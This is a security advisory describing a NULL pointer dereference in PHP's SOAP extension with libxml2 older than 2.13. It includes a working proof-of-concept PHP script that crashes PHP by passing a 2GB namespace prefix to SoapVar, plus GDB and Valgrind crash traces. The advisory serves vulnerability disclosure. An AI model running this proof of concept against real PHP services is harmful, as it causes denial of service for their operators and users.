Описание
NULL Pointer Dereference in PHP SOAP Extension via Large XML Namespace Prefix
Summary
If a SoapVar instance is created with a fully qualified name larger than 2G, this will cause a NULL pointer dereference resulting in a segmentation fault, leading to a denial of service.
Product: PHP <= 8.5.0-dev with libxml2 < 2.13
Discovered by: Ahmed Lekssays (Qatar Computing Research Institute).
Details
Libxml versions prior to 2.13 cannot correctly handle a call to xmlNodeSetName() with a name longer than 2G. It will leave the node object in an invalid state with a NULL name. This later causes a NULL pointer dereference when using the name during message serialization.
This can be exploited if a SoapVar is created with a fully qualified name that is longer than 2G. This would be possible if some application code uses a namespace prefix from an untrusted source like from a remote SOAP service.
PoC
Create a PHP file with the following content:
<?php
ini_set('memory_limit', '6144M');
// 2 GB prefix to overflow int (INT_MAX = 2147483647)
$hugePrefix = str_repeat("A", 0x7fffffff);
// This is the local part of the XML name
$localName = "Element";
// This will be passed to xmlBuildQName(prefix: hugePrefix, ncname: localName)
$soapVar = new SoapVar(
"value",
XSD_STRING,
null,
null,
"{$hugePrefix}:{$localName}" // Triggers xmlBuildQName
);
$options = [
'location' => 'http://127.0.0.1/', // localhost dummy
'uri' => 'urn:dummy',
'trace' => 1,
'exceptions' => true,
];
try {
$client = new SoapClient(null, $options);
$client->__soapCall("DummyFunction", [$soapVar]);
} catch (Exception $e) {
echo "Caught Exception: " . $e->getMessage() . "\n";
}
?>
Run with: php poc.php
The script will immediately crash with a segmentation fault. GDB shows the crash occurs in strcmp() with a null pointer dereference. Valgrind confirms "Invalid read of size 1 at address 0x0".
Impact
This is a null pointer dereference vulnerability (CWE-476) that affects any PHP installation with the SOAP extension enabled. The vulnerability can be triggered when a SoapVar is created with a qualified name based on user-controlled SOAP data.
Impact includes:
- Denial of Service: Reliable crash causing PHP process termination
- Service disruption: Affects web applications using SOAP functionality
GDB Trace
GNU gdb (Ubuntu 16.2-8ubuntu1) 16.2
Reading symbols from /usr/local/bin/php...
(gdb) b xmlBuildQName
Breakpoint 1 at 0x14b440
(gdb) run
Starting program: /usr/local/bin/php poc.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/aarch64-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
__GI_strcmp () at ../sysdeps/aarch64/strcmp.S:78
(gdb) bt
#0 __GI_strcmp () at ../sysdeps/aarch64/strcmp.S:78
#1 0x0000aaaaaaf8e72c in serialize_zval (val=0xfffff76010f0, param=0x0, paramName=0xffffffffc738 "param0", style=1, parent=0xaaaaac484090) at /php-src/ext/soap/soap.c:4175
#2 0x0000aaaaaaf8e55c in serialize_parameter (param=0x0, param_val=0xfffff76010f0, index=0, name=0x0, style=1, parent=0xaaaaac484090) at /php-src/ext/soap/soap.c:4144
#3 0x0000aaaaaaf8ddc8 in serialize_function_call (this_ptr=0xfffff7614220, function=0x0, function_name=0xfffff765f6a8 "DummyFunction", uri=0xfffff765f798 "urn:dummy", arguments=0xfffff76010f0, arg_count=1, version=1, soap_headers=0x0) at /php-src/ext/soap/soap.c:4005
#4 0x0000aaaaaaf87794 in do_soap_call (execute_data=0xfffff7614200, this_ptr=0xfffff7614220, function=0xfffff765f690, arg_count=1, real_args=0xfffff76010f0, return_value=0xffffffffcfb8, location=0xfffff765f730, soap_action=0x0, call_uri=0xfffff765f780, soap_headers=0x0, output_headers=0x0) at /php-src/ext/soap/soap.c:2421
#5 0x0000aaaaaaf88164 in soap_client_call_common (this_ptr=0xfffff7614220, function=0xfffff765f690, args=0xfffff7659480, location=0x0, soap_action=0x0, uri=0x0, soap_headers=0x0, free_soap_headers=false, output_headers=0x0, execute_data=0xfffff7614200, return_value=0xffffffffcfb8) at /php-src/ext/soap/soap.c:2559
#6 0x0000aaaaaaf88664 in zim_SoapClient___soapCall (execute_data=0xfffff7614200, return_value=0xffffffffcfb8) at /php-src/ext/soap/soap.c:2651
#7 0x0000aaaaab286f9c in ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER () at /php-src/Zend/zend_vm_execute.h:1992
#8 0x0000aaaaab317060 in execute_ex (ex=0xfffff7614020) at /php-src/Zend/zend_vm_execute.h:58962
#9 0x0000aaaaab31b918 in zend_execute (op_array=0xfffff7684000, return_value=0x0) at /php-src/Zend/zend_vm_execute.h:64385
#10 0x0000aaaaab3d23c0 in zend_execute_script (type=8, retval=0x0, file_handle=0xffffffffe840) at /php-src/Zend/zend.c:1943
#11 0x0000aaaaab13bea4 in php_execute_script_ex (primary_file=0xffffffffe840, retval=0x0) at /php-src/main/main.c:2594
#12 0x0000aaaaab13c030 in php_execute_script (primary_file=0xffffffffe840) at /php-src/main/main.c:2634
#13 0x0000aaaaab3d4c68 in do_cli (argc=2, argv=0xaaaaac2e5470) at /php-src/sapi/cli/php_cli.c:952
#14 0x0000aaaaab3d5bf8 in main (argc=2, argv=0xaaaaac2e5470) at /php-src/sapi/cli/php_cli.c:1363
Valgrind Trace
valgrind php poc.php
==23007== Memcheck, a memory error detector
==23007== Copyright (C) 2002-2024, and GNU GPL'd, by Julian Seward et al.
==23007== Using Valgrind-3.24.0 and LibVEX; rerun with -h for copyright info
==23007== Command: php poc.php
==23007==
==23007== Warning: set address range perms: large range [0x59c8b000, 0xd9c8c000) (defined)
==23007== Warning: set address range perms: large range [0x59c8b000, 0xd9c8c000) (noaccess)
==23007== Warning: set address range perms: large range [0x59c8b000, 0xd9e8b000) (defined)
==23007== Warning: set address range perms: large range [0xd9e01000, 0x159e02000) (defined)
==23007== Warning: set address range perms: large range [0xd9e01000, 0x159e02000) (noaccess)
==23007== Warning: set address range perms: large range [0xd9e01000, 0x15a001000) (defined)
==23007== Invalid read of size 1
==23007== at 0x488FE8C: strcmp (in /usr/libexec/valgrind/vgpreload_memcheck-arm64-linux.so)
==23007== by 0x5F672B: serialize_zval (soap.c:4175)
==23007== by 0x5F655B: serialize_parameter (soap.c:4144)
==23007== by 0x5F5DC7: serialize_function_call (soap.c:4005)
==23007== by 0x5EF793: do_soap_call (soap.c:2421)
==23007== by 0x5F0163: soap_client_call_common (soap.c:2559)
==23007== by 0x5F0663: zim_SoapClient___soapCall (soap.c:2651)
==23007== by 0x8EEF9B: ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (zend_vm_execute.h:1992)
==23007== by 0x97F05F: execute_ex (zend_vm_execute.h:58962)
==23007== by 0x983917: zend_execute (zend_vm_execute.h:64385)
==23007== by 0xA3A3BF: zend_execute_script (zend.c:1943)
==23007== by 0x7A3EA3: php_execute_script_ex (main.c:2594)
==23007== Address 0x0 is not stack'd, malloc'd or (recently) free'd
==23007==
==23007==
==23007== Process terminating with default action of signal 11 (SIGSEGV)
==23007== Access not within mapped region at address 0x0
==23007== at 0x488FE8C: strcmp (in /usr/libexec/valgrind/vgpreload_memcheck-arm64-linux.so)
==23007== by 0x5F672B: serialize_zval (soap.c:4175)
==23007== by 0x5F655B: serialize_parameter (soap.c:4144)
==23007== by 0x5F5DC7: serialize_function_call (soap.c:4005)
==23007== by 0x5EF793: do_soap_call (soap.c:2421)
==23007== by 0x5F0163: soap_client_call_common (soap.c:2559)
==23007== by 0x5F0663: zim_SoapClient___soapCall (soap.c:2651)
==23007== by 0x8EEF9B: ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (zend_vm_execute.h:1992)
==23007== by 0x97F05F: execute_ex (zend_vm_execute.h:58962)
==23007== by 0x983917: zend_execute (zend_vm_execute.h:64385)
==23007== by 0xA3A3BF: zend_execute_script (zend.c:1943)
==23007== by 0x7A3EA3: php_execute_script_ex (main.c:2594)
==23007== Address 0x0 is not stack'd, malloc'd or (recently) free'd
==23007==
==23007== HEAP SUMMARY:
==23007== in use at exit: 2,512,339 bytes in 16,376 blocks
==23007== total heap usage: 17,710 allocs, 1,334 frees, 3,078,295 bytes allocated
==23007==
==23007== LEAK SUMMARY:
==23007== definitely lost: 27,168 bytes in 849 blocks
==23007== indirectly lost: 40 bytes in 1 blocks
==23007== possibly lost: 2,040,256 bytes in 13,322 blocks
==23007== still reachable: 444,875 bytes in 2,204 blocks
==23007== suppressed: 0 bytes in 0 blocks
==23007==
==23007== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
Segmentation fault
